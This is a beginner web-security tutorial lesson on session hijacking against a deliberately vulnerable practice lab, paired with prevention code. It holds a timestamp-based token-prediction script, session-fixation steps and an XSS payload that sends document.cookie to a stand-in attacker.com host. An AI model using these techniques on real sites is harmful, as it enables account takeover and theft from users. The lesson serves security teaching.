The Hacker's Arsenal

Lesson 7: Session Hijacking

March 2, 2025 25 min read Beginner

Stealing Identity

Authentication proves who you are once. Sessions remember it afterward.

When you log into a website, you don't re-enter your password for every page. Instead, the server gives you a session token — a secret value that proves you're authenticated. Whoever has that token is you.

Steal the token, steal the identity.

How Sessions Work

The Login Flow

  1. You submit username and password
  2. Server validates credentials
  3. Server creates a session and stores it
  4. Server sends you a session token (usually in a cookie)
  5. Your browser sends this cookie with every request
  6. Server checks the cookie and knows it's you

Session Cookies

HTTP/1.1 200 OK
Set-Cookie: session=abc123xyz; HttpOnly; Secure; Path=/

Your browser now sends this with every request:

GET /dashboard HTTP/1.1
Cookie: session=abc123xyz

The server sees session=abc123xyz and loads your account.

Building the Session Lab

Download and run the session hijacking practice lab:

Session Hijacking Lab

Practice session prediction, fixation, and CSRF attacks

Download session_lab.py View Code
Run with: python3 session_lab.py

The lab includes multiple vulnerabilities:

  1. Weak Session Generation - Predictable tokens based on timestamps
  2. Session Fixation - Accepts user-provided session IDs
  3. Dashboard Access - Test stolen session tokens
  4. Money Transfer - CSRF-vulnerable form (no token protection)
  5. Active Sessions View - Shows all current sessions (for demonstration)

Test users: admin/admin123, john/password1, jane/qwerty

Attack 1: Session Prediction

The Vulnerability

The lab generates sessions using timestamps:

hashlib.md5(str(time.time()).encode()).hexdigest()[:16]

If you know approximately when someone logged in, you can predict their session.

The Exploit

  1. Login as john / password1
  2. Note your session token and the timestamp shown
  3. If admin logged in around the same time, their session is predictable

In Python:

import hashlib
import time

# If admin logged in at approximately this timestamp
timestamp = 1707123456.78

# Try nearby timestamps
for offset in range(-10, 11):
    test_time = timestamp + (offset * 0.01)
    session = hashlib.md5(str(test_time).encode()).hexdigest()[:16]
    print(f"{test_time}: {session}")

Try each predicted session in the dashboard.

Attack 2: Session Fixation

The Vulnerability

The second login form accepts a user-provided session ID:

<input type="text" name="session_id" placeholder="Session ID (optional)">

The Attack Flow

  1. Attacker creates a session ID: attacker_session_123
  2. Attacker sends victim a link: http://site.com/login?session_id=attacker_session_123
  3. Victim logs in, and the server uses attacker_session_123
  4. Attacker knows the session ID — they set it!
  5. Attacker uses attacker_session_123 to access victim's account

Try It

  1. Login with jane/qwerty and set Session ID to my_fixed_session
  2. Log out or open a different browser
  3. Go to Dashboard and enter my_fixed_session
  4. You're logged in as jane!

Attack 3: Session Hijacking via XSS

Remember XSS from Lesson 4? Here's where it becomes powerful.

The Attack

If an application has XSS, you can steal cookies:

<script>
fetch('https://attacker.com/steal?c='+document.cookie);
</script>

The victim's session cookie is sent to your server.

Using the Stolen Session

  1. Open Developer Tools → Application → Cookies
  2. Add a new cookie with the stolen session value
  3. Refresh — you're now logged in as the victim

Or in Burp:

  1. Intercept any request
  2. Replace the Cookie header with the stolen session
  3. Forward the request

Session Security Headers

Look for these cookie flags:

FlagPurposeMissing = Vulnerable
HttpOnlyCan't access via JavaScriptXSS can steal cookies
SecureOnly sent over HTTPSIntercepted on HTTP
SameSiteRestricts cross-site sendingCSRF possible
PathLimits cookie scopeBroader exposure

Secure cookie:

Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict; Path=/

Vulnerable cookie:

Set-Cookie: session=abc123

Prevention (For Developers)

Secure Session Generation

import secrets
session_id = secrets.token_hex(32)  # 64 characters of randomness

Regenerate on Login

Always create a new session after authentication:

def login(user):
    # Destroy old session
    if 'session' in request.cookies:
        delete_session(request.cookies['session'])
    # Create new one
    new_session = create_session(user)
    response.set_cookie('session', new_session)

Secure Cookie Flags

response.set_cookie(
    'session',
    session_id,
    httponly=True,
    secure=True,
    samesite='Strict'
)

Lab Challenges

  1. Predict a session token by analyzing the generation pattern
  2. Perform session fixation to hijack a victim's login
  3. Craft a CSRF attack to steal money from a logged-in user
  4. Combine XSS + Session Hijacking — what would the XSS payload look like?

What's Next?

You can now steal sessions and trick users into attacking themselves. But CSRF deserves its own deep dive.

In Lesson 8: Cross-Site Request Forgery (CSRF), we'll explore advanced CSRF techniques, bypasses, and how to chain it with other vulnerabilities.